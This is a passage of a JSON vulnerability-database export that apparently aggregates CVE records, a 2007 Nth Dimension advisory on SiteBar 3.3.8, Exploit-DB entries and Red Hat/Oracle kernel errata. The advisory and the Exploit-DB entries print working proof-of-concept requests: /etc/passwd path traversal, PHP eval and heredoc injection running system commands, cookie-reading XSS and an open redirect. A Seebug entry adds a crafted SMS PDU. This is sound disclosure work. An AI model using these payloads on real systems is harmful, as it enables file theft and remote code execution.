"type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "The SMS handler for Windows Mobile 2005 Pocket PC Phone edition allows attackers to hide the sender field of an SMS message via a malformed WAP PUSH message that causes the PDU to be incorrectly decoded.", "modified": "2018-10-15T17:45:14", "published": "2007-10-17T20:17:00", "id": "CVE-2007-5493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5493", "title": "CVE-2007-5493", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Absolute path traversal vulnerability in the translation module (translator.php) in SiteBar 3.3.8 allows remote authenticated users to read arbitrary files via an absolute path in the dir parameter, a different vulnerability than CVE-2007-5491.", "modified": "2018-10-15T17:46:03", "published": "2007-10-29T16:46:00", "id": "CVE-2007-5694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5694", "title": "CVE-2007-5694", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in SiteBar 3.3.8 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter to integrator.php; (2) the token parameter in a New Password action, (3) the nid_acl parameter in a Folder Properties action, or (4) the uid parameter in a Modify User action to command.php; or (5) the target parameter to index.php, different vectors than CVE-2006-3320.", "modified": "2018-10-15T17:46:01", "published": "2007-10-29T16:46:00", "id": "CVE-2007-5692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5692", "title": "CVE-2007-5692", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Open redirect vulnerability in command.php in SiteBar 3.3.8 allows remote attackers to redirect users to arbitrary web sites via a URL in the forward parameter in a Log In action.", "modified": "2018-10-15T17:46:04", "published": "2007-10-29T16:46:00", "id": "CVE-2007-5695", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5695", "title": "CVE-2007-5695", "type": "cve", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Eval injection vulnerability in the translation module (translator.php) in SiteBar 3.3.8 allows remote authenticated users to execute arbitrary PHP code via the edit parameter in an upd cmd action, a different vulnerability than CVE-2007-5492.", "modified": "2018-10-15T17:46:02", "published": "2007-10-29T16:46:00", "id": "CVE-2007-5693", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5693", "title": "CVE-2007-5693", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:25:34", "bulletinFamily": "NVD", "description": "Memory leak in the Red Hat Content Accelerator kernel patch in Red Hat Enterprise Linux (RHEL) 4 and 5 allows local users to cause a denial of service (memory consumption) via a large number of open requests involving O_ATOMICLOOKUP.", "modified": "2017-09-28T21:29:38", "published": "2007-11-29T21:46:00", "id": "CVE-2007-5494", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5494", "title": "CVE-2007-5494", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T09:39:06", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in the translation module (translator.php) in SiteBar 3.3.8 allows remote authenticated users to chmod arbitrary files to 0777 via \"..\" sequences in the lang parameter.", "modified": "2011-03-07T22:00:47", "published": "2007-10-17T15:17:00", "id": "CVE-2007-5491", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5491", "type": "cve", "title": "CVE-2007-5491", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Static code injection vulnerability in the translation module (translator.php) in SiteBar 3.3.8 allows remote authenticated users to execute arbitrary PHP code via the value parameter.", "modified": "2018-10-15T17:45:14", "published": "2007-10-17T15:17:00", "id": "CVE-2007-5492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5492", "title": "CVE-2007-5492", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:58", "bulletinFamily": "exploit", "description": "", "modified": "2007-10-22T00:00:00", "published": "2007-10-22T00:00:00", "href": "https://packetstormsecurity.com/files/60265/NDSA20071016.txt.html", "id": "PACKETSTORM:60265", "type": "packetstorm", "title": "NDSA20071016.txt", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nNth Dimension Security Advisory (NDSA20071016) \nDate: 16th October 2007 \nAuthor: Tim Brown <mailto:timb@nth-dimension.org.uk> \nURL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> \nProduct: SiteBar 3.3.8 <http://www.sitebar.org/> \nVendor: Ond\u0159ej Brablc, David Szego and SiteBar Team <http://www.sitebar.org/> \nRisk: High \n \nSummary \n \nThis advisory comes in 4 related parts: \n \n1) SiteBar application has single high risk issues with its translation \nmodule. It can can be made to retrieve any file to which the web server user \nhas read access. \n \n2) SiteBar application has multiple high risk issues with its translation \nmodule. It can be made to execute arbitrary code to gain remote access \nas the web server user typically nobody. \n \n3) SiteBar application has multiple medium risk issues where it is vulnerable \nto Javascript injection within the requested URL. \n \n4) SiteBar application has single medium risk issue where it is vulnerable to \nmalicious redirects within the requested URL. \n \nTechnical Details \n \n1) The SiteBar application translation module can be made to read any \narbitrary file that the web server user has read access to, as it makes \nno sanity checks on the value passed within the dir parameter of the URL, \nfor example: \n \nhttp://192.168.1.1/translator.php?dir=/etc/passwd%00 \n \nNote the use of %00 to terminate the malicious and so prevent the intended \nstring concatenation occuring. \n \n2) The SiteBar application translation module can be forced into code \nexecution can occur in one of two ways. Firstly, it makes no sanity checks \non the value passed within the edit parameter prior to using the value as \npart of an eval() call, for example: \n \nhttp://192.168.1.1/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22); \n \nSecondly, whilst modifying strings within a translation, it makes no sanity \nchecks on the value passed for a given string to be embedded within a HERE \ndocument within the languages strings library. It is therefore possible to \nterminate the HERE document and pass arbitrary code which will be executed \nwhenever the languages strings library is included, for example: \n \nPOST http://192.168.1.1/translator.php?lang=test&edit=text HTTP/1.1 \nHost: 192.168.1.1 \nReferer: http://192.168.1.1/translator.php?lang=test&edit=text \nCookie: SB3COOKIE=1; SB3AUTH=3efab8d1dc9a149d7d1d7866a33d2539 \nContent-Type: application/x-www-form-urlencoded \nContent-length: 47497 \n \ndir=&label%5B0%5D=The+Bookmark+Server+for+Personal+and+Team+Use&md5%5B0%5D=823084516ae27478ec4c5fd40fb32ea8&value%5B0%5D=_P; \n \nsystem('id'); \n \n?> \n \nNote that _P terminates the HERE document. \n \n3) The values of the URL requested are used in within the web pages returned \nby the various scripts, in their unsanitised form. Specifically, it makes \nno sanity checks on the value passed within the multiple parameters of the \nURL, for example: \n \nhttp://192.168.1.1/integrator.php?lang=\"><script>alert('xss')</script> - Allows ' \nhttp://192.168.1.1/command.php?command=New+Password&uid=&token=\"><script>alert(document.cookie)</script> - Does not allow ' \nhttp://192.168.1.1/command.php?command=Folder%20Properties&nid_acl=%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ' \nhttp://192.168.1.1/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ' \nhttp://192.168.1.1/command.php?command='%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ', this one turned out to be CVE-2006-3320. \nhttp://192.168.1.1/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - Allows ' \n \nNote that CVE-2006-3320 had not been resolved at the time of testing, in \nSeptember 2007, and so we included it in our vulnerability report to the vendor \nfor completeness. \n \n4) Finally, the SiteBar can be made to redirect users to malicious locations, \nas it makes no checks on the value passed within the forward parameter of the URL, \nfor example: \n \nhttp://192.168.1.1/command.php?command=Log%20In&forward=http://www.google.com/ \n \nSolutions \n \nFollowing vendor notification on the 27th September 2007, the vendor promptly \nresponded with an initial patch on the 7th October which has been attached along \nwith this advisory and which resolved the reported issues. Nth Dimension would \nrecommend applying this patch as soon as possible. Alternatively, from 3.3.9 \n(available at http://sitebar.org/downloads.php) onwards also include this patch. \nNth Dimension would like to thank Ondraj from the SiteBar team for the way he \nworked to resolve the issue. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.6 (GNU/Linux) \n \niD8DBQFHFo3OVAlO5exu9x8RAhLWAJ0Vw4cessVBHnFMswYp6aDlmriDnwCfXpil \nwyDF4P/iRQ5Ab7FqJFutWBA= \n=Oqb/ \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/60265/NDSA20071016.txt"}], "seebug": [{"lastseen": "2017-11-19T21:53:43", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 26657\r\nCVE ID:CVE-2007-5494\r\nCNCVE ID:CNCVE-20075494\r\n\r\nRed Hat\u662f\u4e00\u6b3e\u57fa\u4e8eLinux\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n Red Hat\u5185\u5b58\u52a0\u901f\u5668\u5b58\u5728\u5185\u6cc4\u9732\u95ee\u9898\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u53ef\u4ee5\u5bf9\u7cfb\u7edf\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u6f0f\u6d1e\u7ec6\u8282\u63d0\u4f9b\n\nRedHat Enterprise Linux Desktop v.5 client\r\nRedHat Enterprise Linux v. 5 server\r\n\n \u5382\u5546\u89e3\u51b3\u65b9\u6848\u6682\u65e0", "modified": "2007-12-04T00:00:00", "published": "2007-12-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2540", "id": "SSV:2540", "type": "seebug", "title": "Red Hat\u5185\u5bb9\u52a0\u901f\u5668\u5185\u5b58\u6cc4\u9732\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:55:52", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 26091\r\nCVE(CAN) ID: CVE-2007-5493\r\n\r\nWindows Mobile\u662f\u5fae\u8f6f\u5f00\u53d1\u7684\u7528\u4e8e\u624b\u673a\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nWindows Mobile\u7684\u77ed\u4fe1\u5904\u7406\u5668\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5982\u679c\u53d1\u9001\u4e86\u7279\u5236\u7684WAP PUSH\u6d88\u606f\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u5728\u63a5\u6536\u8005\u7684\u624b\u673a\u4e0a\u9690\u85cf\u539f\u59cb\u77ed\u4fe1\u7684\u53d1\u9001\u8005\u3002\r\n\r\n\u539f\u59cbPDU\u5982[1]\u6240\u793a\uff0c\u4ee5\u4e0bPDU\u4f1a\u5bfc\u81f4Pocket PC\u7535\u8bdd\u7248\u672c\u7684SMS\u5904\u7406\u5668\u9519\u8bef\u7684\u89e3\u7801PDU\uff0c\u8fd9\u6837\u53d1\u9001\u8005\u7684\u624b\u673a\u53f7\u7801\u548c\u53d1\u9001\u65f6\u95f4\u90fd\u662f\u9519\u8bef\u7684\u3002\r\n\r\n[1] PDU\uff08\u81ea\u52a8\u6362\u884c\uff09\r\n 079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA\r\n AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62\r\n 756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62\r\n 696C652E636F6D000101\r\n\r\nPDU\u7684\u89e3\u7801\u8bf7\u89c1[2]\u3002\u5f53SmartPhone\u63a5\u6536\u5230\u8fd9\u6761\u6d88\u606f\u7684\u65f6\u5019\uff0c\u5c31\u4f1a\u672a\u7ecf\u4ea4\u4e92\u4fbf\u5c06\u5176\u4e22\u5f03\uff0c\u8fd9\u4e5f\u5141\u8bb8\u653b\u51fb\u8005\u672a\u7ecf\u77ed\u4fe1\u63a5\u6536\u8005\u786e\u8ba4\u4fbf\u53ef\u4ee5\u5224\u65ad\u5bf9\u65b9\u624b\u673a\u662f\u5426\u6253\u5f00\u3002\r\n\r\n [2] PDU\u89e3\u7801\r\n\r\n PDU LENGTH IS 118 BYTES\r\n ADDRESS OF DELIVERING SMSC\r\n NUMBER IS : +447785016005\r\n TYPE OF NR. : International\r\n NPI : ISDN/Telephone (E.164/163)\r\n\r\n MESSAGE HEADER FLAGS\r\n MESSAGE TYPE : SMS SUBMIT\r\n REJECT DUPLICATES : NO\r\n VALIDITY PERIOD : RELATIVE\r\n REPLY PATH : NO\r\n USER DATA HEADER : PRESENT\r\n REQ. STATUS REPORT : NO\r\n MSG REFERENCE NR. : 34 (0x22)\r\n\r\n DESTINATION ADDRESS\r\n NUMBER IS : +447716299660\r\n TYPE OF NR. : International\r\n NPI : ISDN/Telephone (E.164/163)\r\n\r\n PROTOCOL IDENTIFIER (0x00)\r\n MESSAGE ENTITIES : SME-to-SME\r\n PROTOCOL USED : Implicit / SC-specific\r\n\r\n DATA CODING SCHEME (0x04)\r\n AUTO-DELETION : OFF\r\n COMPRESSION : OFF\r\n MESSAGE CLASS : NONE\r\n ALPHABET USED : 8bit data\r\n\r\n VALIDITY OF MESSAGE : 24.0 hrs\r\n\r\n USER DATA PART OF SM\r\n USER DATA LENGTH : 96 octets\r\n UDH LENGTH : 6 octets\r\n UDH : 05 04 0B 84 23 F0\r\n UDH ELEMENTS : 05 - Appl. port addressing 16bit\r\n 4 (0x04) Bytes Information Element\r\n 09200 : SOURCE port is: allocated by IANA\r\n 02948 : DESTINATION port is: allocated by IANA\r\n --- DATA ----------------------\r\n 05 04 0B 84 23 F0\r\n USER DATA (TEXT) : %&reg;&#129;\u00ea&macr;&#8218;&acute;&#8222;jE&AElig;\r\n symantec\u2026Symantec\r\n bulkSMS (Unregistered Ver) -\r\n LogixMobile.com\r\n\n\nMicrosoft Windows Mobile 5 PocketPC\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n<a href=\"http://www.microsoft.com/technet/security/\" target=\"_blank\">http://www.microsoft.com/technet/security/</a>", "modified": "2007-10-23T00:00:00", "published": "2007-10-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2324", "id": "SSV:2324", "type": "seebug", "title": "Microsoft Windows Mobile\u77ed\u4fe1\u5904\u7406\u5668\u6765\u6e90\u8ff7\u60d1\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:53:14", "bulletinFamily": "exploit", "description": "SiteBar 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access. CVE-2007-5694. Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30682", "href": "https://www.exploit-db.com/exploits/30682/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n\r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n\r\nThese issues include:\r\n\r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n\r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n\r\nSiteBar 3.3.8 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/translator.php?dir=/etc/passwd%00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30682/"}, {"lastseen": "2016-02-03T12:53:24", "bulletinFamily": "exploit", "description": "SiteBar 3.3.8 (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution. CVE-2007-5693. Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30683", "href": "https://www.exploit-db.com/exploits/30683/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 translator.php upd cmd Action edit Variable Arbitrary PHP Code Execution", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n \r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nThese issues include:\r\n \r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n \r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n \r\nSiteBar 3.3.8 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/30683/"}, {"lastseen": "2016-02-03T12:53:54", "bulletinFamily": "exploit", "description": "SiteBar command.php Modify User Action uid Parameter XSS. CVE-2007-5692 . Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30686", "href": "https://www.exploit-db.com/exploits/30686/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n \r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nThese issues include:\r\n \r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n \r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n \r\nSiteBar 3.3.8 and prior versions are vulnerable.\r\n\r\nhttp://www.example.com/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30686/"}, {"lastseen": "2016-02-03T12:53:35", "bulletinFamily": "exploit", "description": "SiteBar 3.3.8 integrator.php lang Parameter XSS. CVE-2007-5692. Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30684", "href": "https://www.exploit-db.com/exploits/30684/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 integrator.php lang Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n \r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nThese issues include:\r\n \r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n \r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n \r\nSiteBar 3.3.8 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/integrator.php?lang=\"><script>alert('xss')</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30684/"}, {"lastseen": "2016-02-03T12:53:45", "bulletinFamily": "exploit", "description": "SiteBar 3.3.8 index.php target Parameter XSS. CVE-2007-5692. Webapps exploit for php platform", "modified": "2007-10-18T00:00:00", "published": "2007-10-18T00:00:00", "id": "EDB-ID:30685", "href": "https://www.exploit-db.com/exploits/30685/", "type": "exploitdb", "title": "SiteBar <= 3.3.8 index.php target Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/26126/info\r\n \r\nSiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nThese issues include:\r\n \r\n- A local file-include vulnerability\r\n- Multiple arbitrary-script-code-execution vulnerabilities\r\n- Multiple cross-site scripting vulnerabilities\r\n- A URI-redirection vulnerability.\r\n \r\nExploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.\r\n \r\nSiteBar 3.3.8 and prior versions are vulnerable.\r\n\r\nhttp://www.example.com/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30685/"}], "oraclelinux": [{"lastseen": "2018-08-31T01:45:47", "bulletinFamily": "unix", "description": " [2.6.9-67.0.1.0.1.EL]\n - fix entropy flag in bnx2 driver to generate entropy pool (John \n Sobecki) [orabug 5931647]\n - fix enomem due to larger mtu size page alloc (Zach Brown) orabug 5486128\n - fix per_cpu() api bug_on with rds (Zach Brown) orabug 5760648\n \n [2.6.9-67.0.1]\n -kernel ieee80211 off-by-two integer underflow (Anton Arapov) [346361] \n {CVE-2007-4997}\n -fix for NFS attribute timeout handling (Fabio Leite) [371551]\n -fix bad schedule_timeout() call causing excessive delay (Jonathan \n Brassow) [399661]\n -do not return zero in mmap (Rik van Riel) [400811]\n -fs: fix missing dput in do_lookup error case leaks dentries (Eric \n Sandeen) [363461] {CVE-2007-5494}\n -s390: fix LTC39618-kernel panic making lcs interfaces online on LPAR \n (Hans-Joachim Picht) [400801]\n -x86_64: Fix incorrect logic in AMD NMI code (Prarit Bhargava) [404741]\n -scsi: fix diskdump performance regression on mpt fustion driver (Takao \n Indoh) [404781] ", "modified": "2007-12-20T00:00:00", "published": "2007-12-20T00:00:00", "id": "ELSA-2007-1104", "href": "http://linux.oracle.com/errata/ELSA-2007-1104.html", "title": "Important: kernel security and bug fix update ", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:38", "bulletinFamily": "unix", "description": " - CVE-2007-4571 ALSA memory disclosure flaw\n - Tick divider bugs on x86_64\n - CVE-2007-5494 open(O_ATOMICLOOKUP) leaks dentry \n - [PATCH] jbd: wait for already submitted t_sync_datalist buffer to complete (Possibility of in-place data destruction)\n - LSPP: audit rule causes kernel 'out of memory' condition and auditd failure\n - [EL5][BUG] Unexpected SIGILL on NFS/Montecito(ia64)\n - task->mm or slab corruption with CIFS\n - CVE-2007-4997 kernel ieee80211 off-by-two integer underflow\n - LSPP: audit enable not picking up all processes\n - [Broadcom 5.1.z bug] Performance regression on 5705 TG3 NICs\n - LTC35628-kexec/kdump kernel hung on Power5+ and Power6 based systems\n - LTC38135-vSCSI client reports 'Device sdX not ready' after deactive/active device on vSCSI server\n - forcedeth driver mishandles MSI interrupts under high load ", "modified": "2007-11-30T00:00:00", "published": "2007-11-30T00:00:00", "id": "ELSA-2007-0993", "href": "http://linux.oracle.com/errata/ELSA-2007-0993.html", "title": "Important: kernel security update ", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:41:22", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\r\noperating system. \r\n\r\nThese updated packages fix the following security issues:\r\n\r\nA flaw was found in the handling of IEEE 802.11 frames, which affected\r\nseveral wireless LAN modules. In certain situations, a remote attacker\r\ncould trigger this flaw by sending a malicious packet over a wireless\r\nnetwork, causing a denial of service (kernel crash).\r\n(CVE-2007-4997, Important)\r\n\r\nA memory leak was found in the Red Hat Content Accelerator kernel patch.\r\nA local user could use this flaw to cause a denial of service (memory\r\nexhaustion). (CVE-2007-5494, Important)\r\n\r\nAdditionally, the following bugs were fixed:\r\n\r\n* when running the \"ls -la\" command on an NFSv4 mount point, incorrect\r\nfile attributes, and outdated file size and timestamp information were\r\nreturned. As well, symbolic links may have been displayed as actual files.\r\n\r\n* a bug which caused the cmirror write path to appear deadlocked after a\r\nsuccessful recovery, which may have caused syncing to hang, has been\r\nresolved.\r\n\r\n* a kernel panic which occurred when manually configuring LCS interfaces on\r\nthe IBM S/390 has been resolved.\r\n\r\n* when running a 32-bit binary on a 64-bit system, it was possible to\r\nmmap page at address 0 without flag MAP_FIXED set. This has been\r\nresolved in these updated packages.\r\n\r\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\r\ninterrupt counter in \"/proc/interrupts\" on systems running an AMD Opteron\r\nCPU. This caused systems running NMI Watchdog to restart at regular\r\nintervals.\r\n\r\n* a bug which caused the diskdump utility to run very slowly on devices\r\nusing Fusion MPT has been resolved.\r\n\r\nAll users are advised to upgrade to these updated packages, which resolve\r\nthese issues.", "modified": "2017-09-08T12:17:10", "published": "2007-12-19T05:00:00", "id": "RHSA-2007:1104", "href": "https://access.redhat.com/errata/RHSA-2007:1104", "type": "redhat", "title": "(RHSA-2007:1104) Important: kernel security and bug fix update", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:08", "bulletinFamily": "unix", "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nThese new kernel packages contain fixes for the following security issues:\r\n\r\nA memory leak was found in the Red Hat Content Accelerator kernel patch. A\r\nlocal user could use this flaw to cause a denial of service (memory\r\nexhaustion). (CVE-2007-5494, Important)\r\n\r\nA flaw was found in the handling of IEEE 802.11 frames affecting several\r\nwireless LAN modules. In certain circumstances, a remote attacker could\r\ntrigger this flaw by sending a malicious packet over a wireless network and\r\ncause a denial of service (kernel crash). (CVE-2007-4997, Important). \r\n\r\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A local\r\nuser who had the ability to read the /proc/driver/snd-page-alloc file could\r\nsee portions of kernel memory. (CVE-2007-4571, Moderate). \r\n\r\nIn addition to the security issues described above, several bug fixes\r\npreventing possible memory corruption, system crashes, SCSI I/O fails,\r\nnetworking drivers performance regression and journaling block device layer\r\nissue were also included.\r\n\r\nRed Hat Enterprise Linux 5 users are advised to upgrade to these packages,\r\nwhich contain backported patches to resolve these issues.\r\n\r\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil Kettle \r\nfor reporting the security issues corrected by this update.", "modified": "2017-09-08T12:06:07", "published": "2007-11-29T05:00:00", "id": "RHSA-2007:0993", "href": "https://access.redhat.com/errata/RHSA-2007:0993", "type": "redhat", "title": "(RHSA-2007:0993) Important: kernel security update", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:45:51", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:1104\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\r\noperating system. \r\n\r\nThese updated packages fix the following security 